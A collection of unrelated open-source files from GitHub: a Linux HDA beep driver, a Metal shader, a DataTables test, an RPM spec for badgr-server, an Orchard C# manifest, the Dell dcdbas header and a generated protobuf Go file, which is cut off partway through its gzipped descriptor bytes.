static void generate_tone(struct hda_beep *beep, int tone)
{
struct hda_codec *codec = beep->codec;
if (tone && !beep->playing) {
snd_hda_power_up(codec);
if (beep->power_hook)
beep->power_hook(beep, true);
beep->playing = 1;
}
snd_hda_codec_write(codec, beep->nid, 0,
AC_VERB_SET_BEEP_CONTROL, tone);
if (!tone && beep->playing) {
beep->playing = 0;
if (beep->power_hook)
beep->power_hook(beep, false);
snd_hda_power_down(codec);
}
}
static void snd_hda_generate_beep(struct work_struct *work)
{
struct hda_beep *beep =
container_of(work, struct hda_beep, beep_work);
if (beep->enabled)
generate_tone(beep, beep->tone);
}
/* (non-standard) Linear beep tone calculation for IDT/STAC codecs
*
* The tone frequency of beep generator on IDT/STAC codecs is
* defined from the 8bit tone parameter, in Hz,
* freq = 48000 * (257 - tone) / 1024
* that is from 12kHz to 93.75Hz in steps of 46.875 Hz
*/
static int beep_linear_tone(struct hda_beep *beep, int hz)
{
if (hz <= 0)
return 0;
hz *= 1000; /* fixed point */
hz = hz - DIGBEEP_HZ_MIN
+ DIGBEEP_HZ_STEP / 2; /* round to nearest step */
if (hz < 0)
hz = 0; /* turn off PC beep*/
else if (hz >= (DIGBEEP_HZ_MAX - DIGBEEP_HZ_MIN))
hz = 1; /* max frequency */
else {
hz /= DIGBEEP_HZ_STEP;
hz = 255 - hz;
}
return hz;
}
/* HD-audio standard beep tone parameter calculation
*
* The tone frequency in Hz is calculated as
* freq = 48000 / (tone * 4)
* from 47Hz to 12kHz
*/
static int beep_standard_tone(struct hda_beep *beep, int hz)
{
if (hz <= 0)
return 0; /* disabled */
hz = 12000 / hz;
if (hz > 0xff)
return 0xff;
if (hz <= 0)
return 1;
return hz;
}
static int snd_hda_beep_event(struct input_dev *dev, unsigned int type,
unsigned int code, int hz)
{
struct hda_beep *beep = input_get_drvdata(dev);
switch (code) {
case SND_BELL:
if (hz)
hz = 1000;
/* fallthru */
case SND_TONE:
if (beep->linear_tone)
beep->tone = beep_linear_tone(beep, hz);
else
beep->tone = beep_standard_tone(beep, hz);
break;
default:
return -1;
}
/* schedule beep event */
schedule_work(&beep->beep_work);
return 0;
}
static void turn_off_beep(struct hda_beep *beep)
{
cancel_work_sync(&beep->beep_work);
if (beep->playing) {
/* turn off beep */
generate_tone(beep, 0);
}
}
static void snd_hda_do_detach(struct hda_beep *beep)
{
if (beep->registered)
input_unregister_device(beep->dev);
else
input_free_device(beep->dev);
beep->dev = NULL;
turn_off_beep(beep);
}
static int snd_hda_do_attach(struct hda_beep *beep)
{
struct input_dev *input_dev;
struct hda_codec *codec = beep->codec;
input_dev = input_allocate_device();
if (!input_dev)
return -ENOMEM;
/* setup digital beep device */
input_dev->name = "HDA Digital PCBeep";
input_dev->phys = beep->phys;
input_dev->id.bustype = BUS_PCI;
input_dev->dev.parent = &codec->card->card_dev;
input_dev->id.vendor = codec->core.vendor_id >> 16;
input_dev->id.product = codec->core.vendor_id & 0xffff;
input_dev->id.version = 0x01;
input_dev->evbit[0] = BIT_MASK(EV_SND);
input_dev->sndbit[0] = BIT_MASK(SND_BELL) | BIT_MASK(SND_TONE);
input_dev->event = snd_hda_beep_event;
input_set_drvdata(input_dev, beep);
beep->dev = input_dev;
return 0;
}
/**
* snd_hda_enable_beep_device - Turn on/off beep sound
* @codec: the HDA codec
* @enable: flag to turn on/off
*/
int snd_hda_enable_beep_device(struct hda_codec *codec, int enable)
{
struct hda_beep *beep = codec->beep;
if (!beep)
return 0;
enable = !!enable;
if (beep->enabled != enable) {
beep->enabled = enable;
if (!enable)
turn_off_beep(beep);
return 1;
}
return 0;
}
EXPORT_SYMBOL_GPL(snd_hda_enable_beep_device);
/**
* snd_hda_attach_beep_device - Attach a beep input device
* @codec: the HDA codec
* @nid: beep NID
*
* Attach a beep object to the given widget. If beep hint is turned off
* explicitly or beep_mode of the codec is turned off, this doesn't nothing.
*
* The attached beep device has to be registered via
* snd_hda_register_beep_device() and released via snd_hda_detach_beep_device()
* appropriately.
*
* Currently, only one beep device is allowed to each codec.
*/
int snd_hda_attach_beep_device(struct hda_codec *codec, int nid)
{
struct hda_beep *beep;
int err;
if (!snd_hda_get_bool_hint(codec, "beep"))
return 0; /* disabled explicitly by hints */
if (codec->beep_mode == HDA_BEEP_MODE_OFF)
return 0; /* disabled by module option */
beep = kzalloc(sizeof(*beep), GFP_KERNEL);
if (beep == NULL)
return -ENOMEM;
snprintf(beep->phys, sizeof(beep->phys),
"card%d/codec#%d/beep0", codec->card->number, codec->addr);
/* enable linear scale */
snd_hda_codec_write_cache(codec, nid, 0,
AC_VERB_SET_DIGI_CONVERT_2, 0x01);
beep->nid = nid;
beep->codec = codec;
codec->beep = beep;
INIT_WORK(&beep->beep_work, &snd_hda_generate_beep);
mutex_init(&beep->mutex);
err = snd_hda_do_attach(beep);
if (err < 0) {
kfree(beep);
codec->beep = NULL;
return err;
}
return 0;
}
EXPORT_SYMBOL_GPL(snd_hda_attach_beep_device);
/**
* snd_hda_detach_beep_device - Detach the beep device
* @codec: the HDA codec
*/
void snd_hda_detach_beep_device(struct hda_codec *codec)
{
struct hda_beep *beep = codec->beep;
if (beep) {
if (beep->dev)
snd_hda_do_detach(beep);
codec->beep = NULL;
kfree(beep);
}
}
EXPORT_SYMBOL_GPL(snd_hda_detach_beep_device);
/**
* snd_hda_register_beep_device - Register the beep device
* @codec: the HDA codec
*/
int snd_hda_register_beep_device(struct hda_codec *codec)
{
struct hda_beep *beep = codec->beep;
int err;
if (!beep || !beep->dev)
return 0;
err = input_register_device(beep->dev);
if (err < 0) {
codec_err(codec, "hda_beep: unable to register input device\n");
input_free_device(beep->dev);
codec->beep = NULL;
kfree(beep);
return err;
}
beep->registered = true;
return 0;
}
EXPORT_SYMBOL_GPL(snd_hda_register_beep_device);
static bool ctl_has_mute(struct snd_kcontrol *kcontrol)
{
struct hda_codec *codec = snd_kcontrol_chip(kcontrol);
return query_amp_caps(codec, get_amp_nid(kcontrol),
get_amp_direction(kcontrol)) & AC_AMPCAP_MUTE;
}
/* get/put callbacks for beep mute mixer switches */
/**
* snd_hda_mixer_amp_switch_get_beep - Get callback for beep controls
* @kcontrol: ctl element
* @ucontrol: pointer to get/store the data
*/
int snd_hda_mixer_amp_switch_get_beep(struct snd_kcontrol *kcontrol,
struct snd_ctl_elem_value *ucontrol)
{
struct hda_codec *codec = snd_kcontrol_chip(kcontrol);
struct hda_beep *beep = codec->beep;
if (beep && (!beep->enabled || !ctl_has_mute(kcontrol))) {
ucontrol->value.integer.value[0] =
ucontrol->value.integer.value[1] = beep->enabled;
return 0;
}
return snd_hda_mixer_amp_switch_get(kcontrol, ucontrol);
}
EXPORT_SYMBOL_GPL(snd_hda_mixer_amp_switch_get_beep);
/**
* snd_hda_mixer_amp_switch_put_beep - Put callback for beep controls
* @kcontrol: ctl element
* @ucontrol: pointer to get/store the data
*/
int snd_hda_mixer_amp_switch_put_beep(struct snd_kcontrol *kcontrol,
struct snd_ctl_elem_value *ucontrol)
{
struct hda_codec *codec = snd_kcontrol_chip(kcontrol);
struct hda_beep *beep = codec->beep;
if (beep) {
u8 chs = get_amp_channels(kcontrol);
int enable = 0;
long *valp = ucontrol->value.integer.value;
if (chs & 1) {
enable |= *valp;
valp++;
}
if (chs & 2)
enable |= *valp;
snd_hda_enable_beep_device(codec, enable);
}
if (!ctl_has_mute(kcontrol))
return 0;
return snd_hda_mixer_amp_switch_put(kcontrol, ucontrol);
}
EXPORT_SYMBOL_GPL(snd_hda_mixer_amp_switch_put_beep);
| {
"pile_set_name": "Github"
} |
//
// MTMavenVideoFilter.metal
// MetalFilters
//
// Created by alexiscn on 2018/6/8.
//
#include <metal_stdlib>
#include "MTIShaderLib.h"
#include "IFShaderLib.h"
using namespace metalpetal;
fragment float4 MTMavenVideoFragment(VertexOut vertexIn [[ stage_in ]],
texture2d<float, access::sample> inputTexture [[ texture(0) ]],
texture2d<float, access::sample> map1 [[ texture(1) ]],
texture2d<float, access::sample> map2 [[ texture(2) ]],
constant float & strength [[ buffer(0)]],
sampler textureSampler [[ sampler(0) ]])
{
constexpr sampler s(coord::normalized, address::clamp_to_edge, filter::linear);
float4 texel = inputTexture.sample(s, vertexIn.textureCoordinate);
float4 inputTexel = texel;
float3 original = texel.rgb;
// saturation boost
float luma = dot(float3(0.2126, 0.7152, 0.0722), texel.rgb);
texel.rgb = mix(texel.rgb, float3(luma), -0.17);
// contrast boost - darken shadows
texel.rgb = mix(texel.rgb, texel.rgb * float3(0.5, 0.3, 0.3), 0.8 * (1.0 - luma));
// slight boost to highlights
texel.rgb = min(mix(texel.rgb, texel.rgb * float3(1.18, 1.15, 1.1), max(0.0, luma - 0.5)), float3(1.0));
// apply curves
texel.r = map1.sample(s, float2(texel.r, 0.5)).r;
texel.g = map1.sample(s, float2(texel.g, 0.5)).g;
texel.b = map1.sample(s, float2(texel.b, 0.5)).b;
// apply curves2
texel.r = map2.sample(s, float2(texel.r, 0.5)).r;
texel.g = map2.sample(s, float2(texel.g, 0.5)).g;
texel.b = map2.sample(s, float2(texel.b, 0.5)).b;
// tone down
texel.rgb = mix(texel.rgb, original, 0.1);
texel.rgb = mix(inputTexel.rgb, texel.rgb, strength);
return texel;
}
| {
"pile_set_name": "Github"
} |
// DATA_TEMPLATE: empty_table
oTest.fnStart( "bInfiniteScroll" );
$(document).ready( function () {
var oTable = $('#example').dataTable( {
"bScrollInfinite": true,
"sScrollY": "200px",
"bServerSide": true,
"sAjaxSource": "../../../examples/server_side/scripts/server_processing.php"
} );
oTest.fnWaitTest(
"10 rows by default",
null,
function () { return $('#example tbody tr').length == 10; }
);
oTest.fnTest(
"Info",
null,
function () { return $('#example_info').html() == "Showing 1 to 10 of 57 entries"; }
);
oTest.fnTest(
"Get nodes",
null,
function () { return $('#example tbody>tr').length == 10; }
);
oTest.fnTest(
"Get nodes function",
null,
function () { return $('#example').dataTable().fnGetNodes().length == 10; }
);
oTest.fnWaitTest(
"Scroll on 20px adds 10 rows",
function () { $('div.dataTables_scrollBody').scrollTop(20); },
function () { return $('#example tbody tr').length == 20; }
);
oTest.fnTest(
"Info after 20px scroll",
null,
function () { return $('#example_info').html() == "Showing 1 to 20 of 57 entries"; }
);
oTest.fnTest(
"Get nodes after 20px scroll",
null,
function () { return $('#example tbody>tr').length == 20; }
);
oTest.fnTest(
"Get nodes function after 20px scroll",
null,
function () { return $('#example').dataTable().fnGetNodes().length == 20; }
);
oTest.fnWaitTest(
"Scroll on 10px more results in the same number of rows",
function () { $('div.dataTables_scrollBody').scrollTop(30); },
function () { return $('#example tbody tr').length == 20; }
);
oTest.fnTest(
"Info after 10 more px scroll",
null,
function () { return $('#example_info').html() == "Showing 1 to 20 of 57 entries"; }
);
oTest.fnWaitTest(
"Scroll to 280px adds another 10 rows",
function () { $('div.dataTables_scrollBody').scrollTop(280); },
function () { return $('#example tbody tr').length == 30; }
);
oTest.fnTest(
"Info after 240px scroll",
null,
function () { return $('#example_info').html() == "Showing 1 to 30 of 57 entries"; }
);
oTest.fnTest(
"Get nodes after 240px scroll",
null,
function () { return $('#example tbody>tr').length == 30; }
);
oTest.fnTest(
"Get nodes function after 240px scroll",
null,
function () { return $('#example').dataTable().fnGetNodes().length == 30; }
);
oTest.fnWaitTest(
"Filtering will drop back to 10 rows",
function () { oTable.fnFilter('gec') },
function () { return $('#example tbody tr').length == 10; }
);
oTest.fnTest(
"Info after filtering",
null,
function () { return $('#example_info').html() == "Showing 1 to 10 of 20 entries (filtered from 57 total entries)"; }
);
oTest.fnTest(
"Get nodes after filtering",
null,
function () { return $('#example tbody>tr').length == 10; }
);
oTest.fnTest(
"Get nodes function after filtering",
null,
function () { return $('#example').dataTable().fnGetNodes().length == 10; }
);
oTest.fnWaitTest(
"Scroll after filtering adds 10",
function () { $('div.dataTables_scrollBody').scrollTop(20); },
function () { return $('#example tbody tr').length == 20; }
);
oTest.fnWaitTest(
"Get nodes after filtering",
null,
function () { return $('#example tbody>tr').length == 20; }
);
oTest.fnWaitTest(
"Get nodes function after filtering",
null,
function () { return $('#example').dataTable().fnGetNodes().length == 20; }
);
oTest.fnWaitTest(
"Sorting will drop back to 10 rows",
function () {
$('div.dataTables_scrollBody').scrollTop(0);
oTable.fnSort([[1,'asc']])
},
function () { return $('#example tbody tr').length == 10; }
);
oTest.fnWaitTest(
"Scroll after sorting adds 10",
function () { $('div.dataTables_scrollBody').scrollTop(20); },
function () { return $('#example tbody tr').length == 20; }
);
oTest.fnTest(
"Get nodes after scrolling",
null,
function () { return $('#example tbody>tr').length == 20; }
);
oTest.fnTest(
"Get nodes function after scrolling",
null,
function () { return $('#example').dataTable().fnGetNodes().length == 20; }
);
oTest.fnComplete();
} ); | {
"pile_set_name": "Github"
} |
CODE_SIGN_IDENTITY =
CONFIGURATION_BUILD_DIR = ${PODS_CONFIGURATION_BUILD_DIR}/Stencil
FRAMEWORK_SEARCH_PATHS = $(inherited) "${PODS_CONFIGURATION_BUILD_DIR}/PathKit"
GCC_PREPROCESSOR_DEFINITIONS = $(inherited) COCOAPODS=1
OTHER_SWIFT_FLAGS = $(inherited) -D COCOAPODS
PODS_BUILD_DIR = ${BUILD_DIR}
PODS_CONFIGURATION_BUILD_DIR = ${PODS_BUILD_DIR}/$(CONFIGURATION)$(EFFECTIVE_PLATFORM_NAME)
PODS_ROOT = ${SRCROOT}
PODS_TARGET_SRCROOT = ${PODS_ROOT}/Stencil
PRODUCT_BUNDLE_IDENTIFIER = org.cocoapods.${PRODUCT_NAME:rfc1034identifier}
SKIP_INSTALL = YES
| {
"pile_set_name": "Github"
} |
%define name badgr-server
%define install_dir /opt/site
%define app_user web
%define base_dir %{_builddir}/%{version}
%define _unpackaged_files_terminate_build 0
Summary: Badgr Server
Name: %{name}
Version: %{version}
Release: %{release}
Source0: ./%{name}.tar.gz
License: GNU Affero General Public License v3
Group: Development/Libraries
BuildArch: x86_64
BuildRoot: %{_tmppath}/%{name}-%{version}-%{release}-buildroot
Vendor: Concentric Sky, Inc.
BuildRequires: mysql-devel
BuildRequires: autoconf
BuildRequires: automake
BuildRequires: cyrus-sasl-devel
BuildRequires: gcc
BuildRequires: libffi-devel
BuildRequires: libjpeg-turbo
BuildRequires: libjpeg-turbo-devel
BuildRequires: libpng12
BuildRequires: libpng12-devel
BuildRequires: libtool
BuildRequires: libxslt-devel
BuildRequires: memcached-devel
BuildRequires: python2-boto
BuildRequires: python2-boto3
BuildRequires: python-devel
BuildRequires: python-pip
BuildRequires: python-virtualenv
BuildRequires: ruby
BuildRequires: ruby-devel
BuildRequires: rubygems
BuildRequires: swig
BuildRequires: zlib-devel
Requires(pre): /usr/sbin/useradd, /usr/bin/getent
Requires(postun): /usr/sbin/userdel
Requires: apr
Requires: cairo
Requires: libdbi
Requires: libpng12
Requires: libjpeg-turbo
Requires: MySQL-python
%description
Open Badge issuing and management with Django
%prep
%setup -n %{version}
%clean
%{__rm} -rf %{buildroot}
%{__rm} -rf %{install_dir}/builds/%{version}
%{__rm} -rf %{install_dir}/static/%{version}
%pre
/usr/bin/getent group %{app_user} || /usr/sbin/groupadd -r %{app_user}
/usr/bin/getent passwd %{app_user} || /usr/sbin/useradd -r -d %{install_dir} -s /bin/bash %{app_user} -g %{app_user} -k /etc/skel -m
/sbin/usermod -G %{app_user} apache
%preun
%post
%{__rm} -f %{install_dir}/code
%{__rm} -f %{install_dir}/env
%{__rm} -f %{install_dir}/staticfiles
%{__ln_s} -f %{install_dir}/builds/%{version}/code %{install_dir}/code
%{__ln_s} -f %{install_dir}/builds/%{version}/env %{install_dir}/env
%{__ln_s} -f %{install_dir}/static/%{version} %{install_dir}/staticfiles
%{__ln_s} -f %{install_dir}/etc/settings_local.py %{install_dir}/builds/%{version}/code/apps/mainsite/settings_local.py
/bin/chown %{app_user}:%{app_user} -R %{install_dir}
%postun
if [ "$1" = "1" ]; then
# If the first argument to %preun and %postun is 1, the action is an upgrade.
%{__rm} -rf %{install_dir}/builds/%{version}
%{__rm} -rf %{install_dir}/static/%{version}
elif [ "$1" = "0" ]; then
# If the first argument to %preun and %postun is 0, the action is uninstallation.
%{__rm} -rf %{install_dir}/builds/%{version}
%{__rm} -rf %{install_dir}/static/%{version}
%{__rm} -f %{install_dir}/code
%{__rm} -f %{install_dir}/env
%{__rm} -f %{install_dir}/staticfiles
fi
%build
%{__mkdir_p} %{install_dir}/builds/%{version}
# BUILD BASIC VIRTUALENV
/usr/bin/virtualenv %{install_dir}/builds/%{version}/env
# UPGRADE PIP/Virtualenv
%{install_dir}/builds/%{version}/env/bin/pip install -U pip==9.0.3
%{install_dir}/builds/%{version}/env/bin/pip install -U virtualenv==15.0.2
# INSTALL PYCURL FIRST...
export PYCURL_SSL_LIBRARY=nss
%{install_dir}/builds/%{version}/env/bin/easy_install pycurl
# INSTALL PROJECT DEPENDENCIES
%{install_dir}/builds/%{version}/env/bin/pip install -r %{base_dir}/code/requirements.txt
%{__cp} %{base_dir}/code/settings_local.py.build %{base_dir}/code/apps/mainsite/settings_local.py
# RUN ./manage.py dist
%{install_dir}/builds/%{version}/env/bin/python %{base_dir}/code/manage.py dist
# COLLECT STATIC FILES
echo "STATIC_ROOT = '%{base_dir}/static/'" >> %{base_dir}/code/settings_local.py.build
%{__cp} %{base_dir}/code/settings_local.py.build %{base_dir}/code/apps/mainsite/settings_local.py
%{install_dir}/builds/%{version}/env/bin/python %{base_dir}/code/manage.py collectstatic --noinput
%{__rm} -f %{base_dir}/code/apps/mainsite/settings_local.py
# GENERATE VERSION INFO
echo "%{version}-%{release}" > %{base_dir}/code/version.txt
echo '{"version": '"\"%{version}\""', "release": '"\"%{release}\""', "commit_sha": '"\"%{git_sha}\""', "build_date": '"\"%{build_date}\""'}' > %{base_dir}/code/buildInfo.json
%install
%{__mkdir_p} %{buildroot}%{install_dir}/builds/%{version}/code
%{__mkdir_p} %{buildroot}%{install_dir}/static/%{version}/
%{__install} -D -m 640 %{base_dir}/code/apps/mainsite/settings_local.py.example %{buildroot}%{install_dir}/etc/settings_local.py
%{__install} -D -m 640 %{base_dir}/code/wsgi.py %{buildroot}%{install_dir}/wsgi/wsgi.py
%{__cp} -Rp %{base_dir}/static/* %{buildroot}%{install_dir}/static/%{version}/
%{__cp} -Rp %{base_dir}/code/* %{buildroot}%{install_dir}/builds/%{version}/code/
%{__cp} -Rp %{install_dir}/builds/%{version}/env %{buildroot}%{install_dir}/builds/%{version}/
%files
%license %{install_dir}/builds/%{version}/code/LICENSE
%defattr(0750,%{app_user},%{app_user},0750)
%{install_dir}/wsgi/wsgi.py
%{install_dir}/builds/%{version}
%{install_dir}/static/%{version}
%config(noreplace) %attr(0644,root,root) %{install_dir}/etc/settings_local.py
%changelog
* Wed Apr 25 2018 Francisco Gray <[email protected]>
- Pinned versions of pip and virtualenv
* Thu Feb 22 2018 Francisco Gray <[email protected]>
- Removed npm install / build step
* Thu Oct 26 2017 Francisco Gray <[email protected]>
- Removed httpd and mod_wsgi from Requires
* Mon Oct 9 2017 Francisco Gray <[email protected]>
- Updated pre/preun post/postun logic to work correctly during an upgrade.
* Fri Oct 6 2017 Francisco Gray <[email protected]>
- First packaging of badgr-server
| {
"pile_set_name": "Github"
} |
using System;
using System.Collections.Generic;
using System.IO;
using System.Linq;
using Orchard.Caching;
using Orchard.Environment;
using Orchard.Environment.Extensions;
using Orchard.FileSystems.VirtualPath;
using Orchard.UI.Resources;
using Orchard.Utility.Extensions;
using Orchard.Workflows.Services;
namespace Orchard.Workflows {
public class ResourceManifest : IResourceManifestProvider {
private readonly Work<IActivitiesManager> _activitiesManager;
private readonly IHostEnvironment _hostEnvironment;
private readonly IExtensionManager _extensionManager;
private readonly IVirtualPathProvider _virtualPathProvider;
private readonly ICacheManager _cacheManager;
public ResourceManifest(
Work<IActivitiesManager> activitiesManager,
IHostEnvironment hostEnvironment,
IExtensionManager extensionManager,
IVirtualPathProvider virtualPathProvider,
ICacheManager cacheManager) {
_activitiesManager = activitiesManager;
_hostEnvironment = hostEnvironment;
_extensionManager = extensionManager;
_virtualPathProvider = virtualPathProvider;
_cacheManager = cacheManager;
}
public void BuildManifests(ResourceManifestBuilder builder) {
var manifest = builder.Add();
manifest.DefineStyle("WorkflowsAdmin").SetUrl("orchard-workflows-admin.css").SetDependencies("~/Themes/TheAdmin/Styles/Site.css");
manifest.DefineScript("jsPlumb").SetUrl("jquery.jsPlumb-1.4.1-all-min.js").SetDependencies("jQueryUI");
// Trying to find a matching activity CSS for each activity in the extensions they come from.
var resourceNamesAndPaths = _cacheManager.Get("Orchard.Workflows.ActivityResourceNames", context => {
var resourceNameAndPathList = new List<Tuple<string, string>>();
foreach (var activity in _activitiesManager.Value.GetActivities()) {
var assemblyName = activity.GetType().Assembly.GetName().Name;
var extension = _extensionManager.GetExtension(assemblyName);
if (extension == null) continue;
var stylesPath = _virtualPathProvider.Combine(extension.VirtualPath, "Styles");
var resourceName = "WorkflowsActivity-" + activity.Name;
var filename = resourceName.HtmlClassify() + ".css";
var filePath = _virtualPathProvider.Combine(_hostEnvironment.MapPath(stylesPath), filename);
if (File.Exists(filePath)) {
/* Since stylesheets are shapes, we don't need to create the resource with the full path to the CSS file,
* because extensions can override those shapes by file name if they reference Orchard.Workflows,
* even when they don't exist in Orchard.Workflows. */
resourceNameAndPathList.Add(Tuple.Create(resourceName, filename));
}
}
return resourceNameAndPathList;
});
foreach (var resourceNameAndPath in resourceNamesAndPaths) {
manifest
.DefineStyle(resourceNameAndPath.Item1)
.SetUrl(resourceNameAndPath.Item2)
.SetDependencies("WorkflowsAdmin");
}
manifest
.DefineStyle("WorkflowsActivities")
.SetDependencies(resourceNamesAndPaths.Select(resourceNameAndPath => resourceNameAndPath.Item1).ToArray());
}
}
}
| {
"pile_set_name": "Github"
} |
version https://git-lfs.github.com/spec/v1
oid sha256:2d8f43cee31f268e5c1828308b3994bdbb3e57fe02297bca6623d6ed5e9d57c6
size 7422656
| {
"pile_set_name": "Github"
} |
// Copyright (c) Microsoft. All Rights Reserved. Licensed under the Apache License, Version 2.0. See License.txt in the project root for license information.
using Microsoft.CodeAnalysis.Options;
namespace ShaderTools.CodeAnalysis.Navigation
{
internal static class NavigationOptions
{
/// <summary>
/// This option can be passed to the <see cref="IDocumentNavigationService"/> APIs to request that a provisional (or preview) tab
/// be used for any document that needs to be opened, if one is available.
/// </summary>
public static readonly Option<bool> PreferProvisionalTab = new Option<bool>(nameof(NavigationOptions), nameof(PreferProvisionalTab), defaultValue: false);
}
}
| {
"pile_set_name": "Github"
} |
/* SPDX-License-Identifier: GPL-2.0-only */
/*
* dcdbas.h: Definitions for Dell Systems Management Base driver
*
* Copyright (C) 1995-2005 Dell Inc.
*/
#ifndef _DCDBAS_H_
#define _DCDBAS_H_
#include <linux/device.h>
#include <linux/sysfs.h>
#include <linux/types.h>
#define MAX_SMI_DATA_BUF_SIZE (256 * 1024)
#define HC_ACTION_NONE (0)
#define HC_ACTION_HOST_CONTROL_POWEROFF BIT(1)
#define HC_ACTION_HOST_CONTROL_POWERCYCLE BIT(2)
#define HC_SMITYPE_NONE (0)
#define HC_SMITYPE_TYPE1 (1)
#define HC_SMITYPE_TYPE2 (2)
#define HC_SMITYPE_TYPE3 (3)
#define ESM_APM_CMD (0x0A0)
#define ESM_APM_POWER_CYCLE (0x10)
#define ESM_STATUS_CMD_UNSUCCESSFUL (-1)
#define CMOS_BASE_PORT (0x070)
#define CMOS_PAGE1_INDEX_PORT (0)
#define CMOS_PAGE1_DATA_PORT (1)
#define CMOS_PAGE2_INDEX_PORT_PIIX4 (2)
#define CMOS_PAGE2_DATA_PORT_PIIX4 (3)
#define PE1400_APM_CONTROL_PORT (0x0B0)
#define PCAT_APM_CONTROL_PORT (0x0B2)
#define PCAT_APM_STATUS_PORT (0x0B3)
#define PE1300_CMOS_CMD_STRUCT_PTR (0x38)
#define PE1400_CMOS_CMD_STRUCT_PTR (0x70)
#define MAX_SYSMGMT_SHORTCMD_PARMBUF_LEN (14)
#define MAX_SYSMGMT_LONGCMD_SGENTRY_NUM (16)
#define TIMEOUT_USEC_SHORT_SEMA_BLOCKING (10000)
#define EXPIRED_TIMER (0)
#define SMI_CMD_MAGIC (0x534D4931)
#define SMM_EPS_SIG "$SCB"
#define DCDBAS_DEV_ATTR_RW(_name) \
DEVICE_ATTR(_name,0600,_name##_show,_name##_store);
#define DCDBAS_DEV_ATTR_RO(_name) \
DEVICE_ATTR(_name,0400,_name##_show,NULL);
#define DCDBAS_DEV_ATTR_WO(_name) \
DEVICE_ATTR(_name,0200,NULL,_name##_store);
#define DCDBAS_BIN_ATTR_RW(_name) \
struct bin_attribute bin_attr_##_name = { \
.attr = { .name = __stringify(_name), \
.mode = 0600 }, \
.read = _name##_read, \
.write = _name##_write, \
}
struct smi_cmd {
__u32 magic;
__u32 ebx;
__u32 ecx;
__u16 command_address;
__u8 command_code;
__u8 reserved;
__u8 command_buffer[1];
} __attribute__ ((packed));
struct apm_cmd {
__u8 command;
__s8 status;
__u16 reserved;
union {
struct {
__u8 parm[MAX_SYSMGMT_SHORTCMD_PARMBUF_LEN];
} __attribute__ ((packed)) shortreq;
struct {
__u16 num_sg_entries;
struct {
__u32 size;
__u64 addr;
} __attribute__ ((packed))
sglist[MAX_SYSMGMT_LONGCMD_SGENTRY_NUM];
} __attribute__ ((packed)) longreq;
} __attribute__ ((packed)) parameters;
} __attribute__ ((packed));
int dcdbas_smi_request(struct smi_cmd *smi_cmd);
struct smm_eps_table {
char smm_comm_buff_anchor[4];
u8 length;
u8 checksum;
u8 version;
u64 smm_comm_buff_addr;
u64 num_of_4k_pages;
} __packed;
#endif /* _DCDBAS_H_ */
| {
"pile_set_name": "Github"
} |
// Code generated by protoc-gen-gogo. DO NOT EDIT.
// source: combos/both/map.proto
/*
Package mapdefaults is a generated protocol buffer package.
It is generated from these files:
combos/both/map.proto
It has these top-level messages:
MapTest
FakeMap
FakeMapEntry
*/
package mapdefaults
import proto "github.com/gogo/protobuf/proto"
import fmt "fmt"
import math "math"
import _ "github.com/gogo/protobuf/gogoproto"
import github_com_gogo_protobuf_protoc_gen_gogo_descriptor "github.com/gogo/protobuf/protoc-gen-gogo/descriptor"
import github_com_gogo_protobuf_proto "github.com/gogo/protobuf/proto"
import compress_gzip "compress/gzip"
import bytes "bytes"
import io_ioutil "io/ioutil"
import strings "strings"
import reflect "reflect"
import github_com_gogo_protobuf_sortkeys "github.com/gogo/protobuf/sortkeys"
import io "io"
// Reference imports to suppress errors if they are not otherwise used.
var _ = proto.Marshal
var _ = fmt.Errorf
var _ = math.Inf
// This is a compile-time assertion to ensure that this generated file
// is compatible with the proto package it is being compiled against.
// A compilation error at this line likely means your copy of the
// proto package needs to be updated.
const _ = proto.GoGoProtoPackageIsVersion2 // please upgrade the proto package
type MapTest struct {
StrStr map[string]string `protobuf:"bytes,1,rep,name=str_str,json=strStr" json:"str_str,omitempty" protobuf_key:"bytes,1,opt,name=key,proto3" protobuf_val:"bytes,2,opt,name=value,proto3"`
}
func (m *MapTest) Reset() { *m = MapTest{} }
func (*MapTest) ProtoMessage() {}
func (*MapTest) Descriptor() ([]byte, []int) { return fileDescriptorMap, []int{0} }
type FakeMap struct {
Entries []*FakeMapEntry `protobuf:"bytes,1,rep,name=entries" json:"entries,omitempty"`
}
func (m *FakeMap) Reset() { *m = FakeMap{} }
func (*FakeMap) ProtoMessage() {}
func (*FakeMap) Descriptor() ([]byte, []int) { return fileDescriptorMap, []int{1} }
type FakeMapEntry struct {
Key string `protobuf:"bytes,1,opt,name=key,proto3" json:"key,omitempty"`
Value string `protobuf:"bytes,2,opt,name=value,proto3" json:"value,omitempty"`
Other string `protobuf:"bytes,3,opt,name=other,proto3" json:"other,omitempty"`
}
func (m *FakeMapEntry) Reset() { *m = FakeMapEntry{} }
func (*FakeMapEntry) ProtoMessage() {}
func (*FakeMapEntry) Descriptor() ([]byte, []int) { return fileDescriptorMap, []int{2} }
func init() {
proto.RegisterType((*MapTest)(nil), "mapdefaults.MapTest")
proto.RegisterType((*FakeMap)(nil), "mapdefaults.FakeMap")
proto.RegisterType((*FakeMapEntry)(nil), "mapdefaults.FakeMapEntry")
}
func (this *MapTest) Description() (desc *github_com_gogo_protobuf_protoc_gen_gogo_descriptor.FileDescriptorSet) {
return MapDescription()
}
func (this *FakeMap) Description() (desc *github_com_gogo_protobuf_protoc_gen_gogo_descriptor.FileDescriptorSet) {
return MapDescription()
}
func (this *FakeMapEntry) Description() (desc *github_com_gogo_protobuf_protoc_gen_gogo_descriptor.FileDescriptorSet) {
return MapDescription()
}
func MapDescription() (desc *github_com_gogo_protobuf_protoc_gen_gogo_descriptor.FileDescriptorSet) {
d := &github_com_gogo_protobuf_protoc_gen_gogo_descriptor.FileDescriptorSet{}
var gzipped = []byte{
// 3834 bytes of a gzipped FileDescriptorSet
0x1f, 0x8b, 0x08, 0x00, 0x00, 0x00, 0x00, 0x00, 0x02, 0xff, 0xc4, 0x5a, 0x5d, 0x70, 0x1b, 0xd7,
0x75, 0xe6, 0xe2, 0x87, 0x04, 0x0e, 0x40, 0x70, 0xb9, 0xa4, 0x24, 0x88, 0x89, 0x21, 0x0a, 0xfe,
0xa3, 0xed, 0x06, 0xcc, 0x48, 0x96, 0x2c, 0x41, 0x8d, 0x5d, 0x10, 0x84, 0x18, 0xa8, 0x24, 0x81,
0x2c, 0xc8, 0x58, 0x4e, 0x1f, 0x76, 0x96, 0x8b, 0x0b, 0x60, 0xa5, 0xc5, 0xee, 0x66, 0x77, 0x21,
0x99, 0x9a, 0xce, 0x54, 0x1d, 0xf7, 0x67, 0x32, 0x9d, 0xfe, 0x77, 0xa6, 0x89, 0xeb, 0xb8, 0x6d,
